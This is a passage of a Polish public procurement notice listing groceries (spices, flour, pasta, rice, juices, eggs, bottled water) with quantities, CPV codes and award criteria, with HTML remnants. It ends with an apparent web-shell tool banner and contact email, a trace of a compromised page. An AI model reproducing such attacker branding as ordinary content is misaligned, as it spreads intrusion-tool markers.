Kasza manna op. 1000g	
Kg	
20

Kardamon mielony 
op. 10 g. typu kamis 	
Szt.	
10
Kminek mielony op. 20 g.
typu kamis lub typu prymat	Szt. 	10

Kawa zbożowa rozpuszczalna typu inka op. 150g	
Szt	
50

Ketchup o zawartości pomidorów 45 g na 100g  bez konserwantów, łagodny, typu  udliszki, typu kotlin op.450-480g	
Szt	
100


Koncentrat pomidorowy wyprodukowany ze świeżych pomidorów bez konserwantów, bez sztucznych dodatków, zawartość ekstraktu 30% op. szklany słoik 200g typu pudliszki, wartość energetyczna w 100g produktu: 105 kcal	
Szt	
300

Kasza Kuskus op. 250 g - 300 g	
Szt	
50

Kwasek cytrynowy min. 20g	
Szt 	
10
Koperek suszony op. 6 g. 
typu kamis lub typu prymat	
Szt.	
20
Kurkuma op. 20 g.
typu kamis lub typu prymat	
Szt. 	
10

Liście laurowe op. 6-10g typu kamis lub typu prymat	
Szt	
50

Lubczyk op. 8-10g typu kamis lub typu prymat	
Szt. 	
40

Majeranek op. 8-10g typu kamis lub typu prymat	
Szt	
100

Majonez op.400g w słoiku - bez konserwantów typu winiary	
Szt	
100

Makaron z pszenicy durum 100%, różne formy op. 400g lub 500g typu lubella	
Kg
	
150

Makaron do rosołu domowy, swojski, nitki walcowane, krótkie,  typu goliard.op.  250 g	
Kg
	
25
Makaron z pełnego ziarna z orkiszem, różne formy, op.400 -500g typu lubella	
Kg	
40

Mąka orkiszowa jasna op. 1000g	
Kg
	
20


Mąka żytnia bez polepszaczy op. 1000g	
Kg 	
10

Mąka ziemniaczana op. 1000g	
Kg
	
15

Mąka pszenna op. 1000g	
Kg	
280


Mięta ekspresowa op. 20 szt	
Szt	
25

Migdały op. 100 g.	
Szt	
40

Miód pszczeli naturalny produkcji polskiej, opakowanie słoik szklany z  informacją na etykiecie zawierającą imię i nazwisko producenta oraz numer weterynaryjny Pasieki Produkującej i Rozlewającej, wielkokwiatowy, lipowy, spadziowy.	
Kg	
120

Morele suszone op.  200g 	


Szt 	
40
Musztarda Dijon, opakowanie szklany słoik 185g, bez konserwantów, bez cukru, typu kamis	
Szt	
10
Natka pietruszki suszona op. 6-8 g. typu kamis lub typu prymat	
Szt.	
10
Ocet jabłkowy 6% opakowanie butelka szklana 250 ml, typu kamis	Szt. 	10

Oregano  op. 10g typu kamis lub typu prymat	
Szt	
40

Olej rzepakowy z pierwszego tłoczenia typu kujawski op. 1 litr 	
Litr	
230

Oliwa z oliwek z pierwszego tłoczenia, tłoczona na zimno, butelka szklana 500ml	
Szt	
10

Orzechy włoskie łuskane op. 200g	
Szt 
	
       40

Orzechy laskowe łuskane op. 200g
	
Szt 
	
40

Papryka słodka w proszku op.20g typu kamis lub typu prymat	
Szt	
40

Papryka ostra w proszku op.20g typu kamis lub typu prymat	
Szt. 	
10

Pestki z dyni 	
Kg 	
4

Pestki ze słonecznika	
Kg. 	
4

Paluszki junior dla dzieci op. 250g, zawartość cukrów do 7 % wartość energetyczna w 100g: 398 kcal, typu lajkonik	
Szt	
30

Pieprz czarny, prawdziwy, mielony op.10-20 g typu kamis lub typu prymat	
Szt	
120

Pieprz biały mielony 
op.15 g. typu kamis lub typu prymat	
Szt.	
15

Pieprz kolorowy w ziarenkach op.15 g.- 20 g. typu kamis lub typu prymat	
Szt. 	
20

Pieprz ziołowy bez dodatku soli, op. 10 g.-20 g.
typu kamis lub typu prymat	
Szt. 	
20

Płatki owsiane górskie
 op. 500g	
Szt	
30

PŁATKI KUKURYDZIANE, zawartość kukurydzy min. 98%, z substancjami wzbogacającymi m.in. witamina C, niacyna, żelazo zredukowane, wartość energetyczna w 100g produktu min. 370 kcal, opakowanie 500g typu nestle
	
Szt	
20

Płatki ryżowe błyskawiczne, op. nie większe niż 1000 g. 	
Kg
	
15

Płatki jęczmienne błyskawiczne, op.500 g	
Szt.	
20
Płatki migdałowe op. 150 g. 	Szt. 	10

Proszek do pieczenia op. 30g typu delecta	 
Szt	
20

Przecier pomidorowy op. karton 500g, zawartość pomidorów 99%, bez konserwantów typu pudliszki lub typu łowicz	
Szt	
120

Rodzynki sułtańskie op.100g 	
Szt
	
50

Rumianek ekspresowy op. 20 szt	
Szt
	
50

Ryż biały długoziarnisty I klasa 	
Kg	
80

Ryż parboiled I klasa typu britta	
Kg	
60
Ryż brązowy I klasa 	
Kg  	


20

Soda oczyszczona op. 100g. 	
Szt 	
10

Soczewica czerwona op.max.1000g	
Kg
	
20

Soczewica zielona op.max.1000g	
Kg
	
10

Sok owocowy 100% bez konserwantów, bez barwników, bez dodatku cukru, zawartość cukrów do 10g w 100 ml  
op.karton 0,2 l ze słomką	
Szt	
700

Sok owocowy 100% bez konserwantów, bez barwników, bez dodatku cukru, zawartość cukrów do 10g w 100 ml,op. karton 1 l	
Szt	
300

Sól kamienna op. 1000g	
Kg	
10
Sól o obniżonej zawartości sodu, morska, z dodatkiem magnezu i potasu, bez antyzbrylacza,  
op. 350g	
Kg 	
50

Szczaw konserwowy -op. słoik 350g	
Szt	
120

Tymianek op. 10g typu kamis lub typu prymat	
Szt
	
20

Wiórki kokosowe op. 250 g. 
typu bakalland	
Szt. 	
5


Woda niegazowana but.plastik 1,5 litr	
Szt	
250

Zacierki op. 250g	
Szt	
100

Ziele angielskie całe op. 10- 15g typu kamis lub typu prymat	
Szt	
60

Ziele angielskie mielone 
op. 10- 15g typu kamis lub typu prymat	
Szt	
20

Zioła prowansalskie op. 10 -15 g typu kamis lub typu prymat	
Szt	
40

Żurawina suszona 150 g. typu bakalland	
Szt. 	
10
Jaja kurze z wolnego wybiegu z oznaczeniem na skorupce 1-PL, wielkość L, świeże, klasa A, gat.I	
Szt. 	
6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Woda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana, niegazowana, butle o pojemności ok. 19 litrów hermetycznie  zamykana	szt.	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com